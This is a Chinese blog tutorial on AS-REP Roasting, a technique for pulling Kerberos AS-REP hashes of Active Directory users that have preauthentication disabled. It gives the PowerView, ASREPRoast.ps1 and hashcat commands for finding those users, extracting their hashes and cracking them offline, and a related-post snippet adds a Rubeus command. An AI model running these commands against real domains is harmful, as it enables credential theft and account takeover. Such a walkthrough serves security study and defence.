[内网渗透]—AS-REP Roasting攻击

已于 2022-12-17 12:14:30 修改
阅读量315 收藏 2
点赞数
分类专栏: 内网 文章标签: 哈希算法 数据库 算法
于 2022-12-16 11:23:51 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_54902210/article/details/128340443
版权

简介

AS-REP Roasting是一种对用户账号进行离线爆破的攻击方式。但是该攻击方式利用比较局限,因为其需要用户账号设置 "Do not require Kerberos preauthentication(不需要kerberos预身份验证) " 。而该属性默认是没有勾选上的。

预身份验证是Kerberos身份验证的第一步(AS_REQ & AS_REP),它的主要作用是防止密码脱机爆破。默认情况下,预身份验证是开启的,KDC会记录密码错误次数,防止在线爆破。

当关闭了预身份验证后,攻击者可以使用指定用户去请求票据,此时域控不会作任何验证就将 TGT票据 和 该用户Hash加密的Login Session Key返回。因此,攻击者就可以对获取到的用户Hash加密的Login Session Key进行离线破解,如果破解成功,就能得到该指定用户的密码明文。

AS-REP Roasting Attack

攻击条件

  • 域用户设置了 “ Do not require Kerberos preauthentication(不需要kerberos预身份验证) ”
  • 需要一台可与域控进行通信的主机 / 用户

在这里插入图片描述

Attack

1、用PowerView查找域中设置了 “不需要kerberos预身份验证” 的用户

powershell -exec bypass
Import-Module .\PowerView.ps1
Get-DomainUser -PreauthNotRequired

在这里插入图片描述

2、获取用户后,接着使用ASREPRoast.ps1获取AS-REP返回的Hash

Import-Module .\ASREPRoast.ps1
Get-ASREPHash -UserName test -Domain sentiment.com -Server 192.168.52.163 | Out-File -Encoding ASCII hash.txt

在这里插入图片描述

3、将hash改成hashcat所能识别的格式,即:在$krb5asrep后加上$23

Hashcat是自称世界上最快的密码恢复工具。它在2015年之前拥有专有代码库,但现在作为免费软件发布。适用于Linux,OS X和Windows的版本可以使用基于CPU或基于GPU的变体。支持hashcat的散列算法有Microsoft LM哈希,MD4,MD5,SHA系列,Unix加密格式,MySQL和Cisco PIX等,可参考:Hashcat的使用手册总结 - 先知社区 (aliyun.com)

在这里插入图片描述

4、使用hashcat对hash进行离线爆破

hashcat -m 18200 hash.txt password.txt --force
-m hash类型
18200代表  | Kerberos 5, etype 23, AS-REP  |  Network Protocol

在这里插入图片描述

参考

Hashcat的使用手册总结 - 先知社区 (aliyun.com)

AS-REP Roasting攻击_山山而川’的博客-CSDN博客

S1nJa
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
AS-REP Roasting攻击
谢公子的博客
03-29 2324
首先,关闭hack2用户的 Kerberos预身份验证。 然后使用 Rubeus执行如下命令 Rubeus.exe asreproast 然后使用hashcat进行爆破
内网渗透(六十)之AS-REP Roasting攻击
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
04-30 1288
AS-REP Roasting是一种针对用户账户进行离线爆破的攻击方式。但是该攻击方式使用上比较受限,因为其需要用户账户设置“不要求Kerberos预身份验证”选项。而该选项默认是没有勾选的。Kerberos域身份验证发生在Kerberos身份验证的第一阶段(AS_REQ&AS_REP),它的主要作用就是防止密码离线爆破。默认情况下,预身份验证是开启的,KDC会记录密码错误的次数,防止在线爆破。
域渗透-AS-REP Roasting攻击
good good study
03-25 1378
AS-REP Roasting是一种对域用户账号hash进行离线爆破的攻击方式。但是该攻击方式利用比较局限,因为其需要用户账号设置 "Do not require Kerberos preauthentication(不需要kerberos预身份验证) "。而该属性默认是没有勾选上的。预身份验证是Kerberos身份验证的第一步(AS_REQ & AS_REP),它的主要作用是防止密码脱机爆破。默认情况下,预身份验证是开启的,KDC会记录密码错误次数,防止在线爆破。
域渗透之AS-REP Roasting
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
12-13 589
攻击者可以使用指定的用户去请求票据,向域控制器发送AS_REQ请求,此时域控会不作任何验证便将 TGT 票据和加密的 Session-key 等信息返回。因此攻击者就可以对获取到的加密 Session-key 进行离线破解,如果爆破成功,就能得到该指定用户的明文密码。
AS-REPRoasting
Ping_Pig的博客
12-30 1335
讲在前面: 最近笔者发布的几篇文章,大家不难发现,都是和kerberos协议相关的。国内外各类的研究员对于该协议的研究愈发的深入,从该协议产生的漏洞就会越来越多甚至越来越严重。当然这只是笔者的一点拙见。 在介绍了Kerberoasting后,与其分不开的一个漏洞AS-REPRoasting我们也要介绍一下。当然,该漏洞依然要建立在受害用户没有使用强壮的符合复杂策略的密码前提下。同时也要强调该漏洞并没有Kerberoasting出彩 简介: 对于域用户,如果设置了选项”Do not requir...
V-rep软件仿真安装包亲测可用
10-23
V-rep(V-REP,Virtual Robot Experimentation Platform)是一款强大的机器人仿真软件,它提供了丰富的功能,用于模拟机器人系统、传感器和环境。该软件广泛应用于教育、研究和工业领域,帮助用户在虚拟环境中进行...
V-rep安装文件.txt
04-20
由于https://www.coppeliarobotics.com/网站需要翻墙才能...V-REP_PRO_EDU_V3_6_2_Ubuntu18_04,V-REP_PRO_EDU_V3_6_2_Setup,V-REP_PRO_EDU_V3_5_0_Setup,V-REP_PRO_EDU_V3_5_0_Linux,V-REP_PRO_EDU_V3_3_2_Setup
v-rep六足建模
10-11
对六足进行了建模,并写好了运行程序,可以根据自己的需要自行修改
V-REP-YouBot-Demo:V-REP平台上的YouBot Control演示
02-03
V-REP-YouBot-Demo 基于V-REP平台的入门级教程及Demo,从零开始学习如何在V-REP平台上进行机器人的仿真和交互。我们定了一个小目标,完成一个Demo。使用官方提供的KUKA公司的YouBot机器人模型来实验机器人的感知和...
V-REP EDU(教育版)
10-10
V-REP EDU是一款专为教育领域设计的虚拟机器人仿真平台,它提供了丰富的功能和工具,使得学习者和开发者无需从零开始构建机器人模型就能进行机械臂的仿真研究。这款软件的强大之处在于它内置了大量的预设模型,包括...
内网安全--AS-REP Roasting攻击
weixin_45910629的博客
04-10 619
AS-REP Roasting是一种对用户账号进行离线爆破的攻击方式。但是该攻击方式利用比较局限,因为其需要用户账户设置“不要求Kerberos预身份验证”选项,而该选项是默认没有勾选上的。Kerberos预身份验证发送在Kerberos身份验证的第一阶段(AS_REQ&AS-REP),它的主要作用是防止密码离线爆破。默认情况下,预身份验证是开启的,KDC会记录密码错误次数,防止在线爆破。
AS-REP Roasting与Kerberoasting利用
qq_18811919的博客
03-03 430
讲解里AS-REP Roasting与Kerberoasting相关配置过程与相关利用方式
域渗透技术解析:Roasting AS-REP
systemino的博客
07-02 960
去年11月,我发表了一篇名为"没有 Mimikatz 的 Kerberoast 攻击利用"的文章,详细介绍了PowerView和Tim Medin提出的Kerberoasting 攻击的最新研究进展。这使我开始更仔细地研究 Kerberos。 几周前,我的同事Lee Christensen发现Exumbra Operations的Geoff Janjua做了一个有趣的演讲,题为"武器化 Kerbe...
集权攻击-无权限条件下AD域凭据获取与利用分析
ZAWX_NETSTARSEC的博客
05-25 1174
我们简单回顾服务票据的请求流程,当域内用户去请求域内某个服务资源时,先会通过AS-REQ进行身份认证,通过后会返回TGT给用户,用户使用TGT发起TGS请求,KDC会返回一个用对应服务账户的Hash加密的服务票据。那么如果我们有一个域用户的凭据可以正常申请TGT,就可以申请指定服务的TGS票据,因该票据使用服务账户的Hash进行加密,当获取到加密后的TGS票据后,即可根据离线爆破得到服务账户的密码,这样请求服务账号票据进行离线爆破的攻击手法叫做Kerberoasting。而该属性默认是没有勾选上的。
Rubeus使用
qq_18811919的博客
02-26 2400
Rubeus使用讲解了TGT|TGS票据的申请,AS-REP Roasting与Kerberoasting和委派相关用法
域渗透非约束委派&Spooler
Longwaer
01-23 1124
学习掌握内网域渗透委派攻击中非约束委派,加上联合Spooler打印机的漏洞更好的了解漏洞原理。
内网安全——ssH协议&Windows&Linux密码获取hashcat
m0_61506558的博客
02-20 2198
我们配置服务器时打开关联密钥时,此次漏洞就可能存在。Hashcat号称宇宙最强密码破解工具,其是一款开源软件,有针对Windows、Mac和Linux的版本,支持CPU、GPU、APU、DSP和FPGA等多种计算核心,支持多种hash散列算法
【字典暴力破解哈希值】一次爆破hash的实验
最新发布
Mr_Fmnwon的博客
04-29 428
通过本实验,我学到了使用字典+明文格式的方式进行密码爆破的手段。在这个过程中,我巩固了使用python与网页API交互的技能,同时强化了网络安全意识(DoS ban ip)。就本实验——暴力破解哈希值——我在过程中搜索了很多口令字典,但是大多都不尽如人意——键盘序弱口令比较少,大多是常用口令字典。但是一旦找到关键的字典——键盘序弱口令字典,爆破就非常快,仅使用10个线程,就能在0.9223217964172363s跑完共1299个口令,并在第0.2798733711242676s成功爆破出hash明文。
1.4离线攻击工具:彩虹表破解
qq_55202378的博客
07-10 2061
彩虹表 Hash函数值
V-REP MATLAB仿真接口指南
"V-rep与Matlab接口指南,摘自官网文档,详述了V-rep与Matlab仿真通信的全过程。" V-rep(Virtual Robot Experimentation Platform)是一款强大的机器人仿真软件,它允许用户创建复杂的机器人场景并进行仿真。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值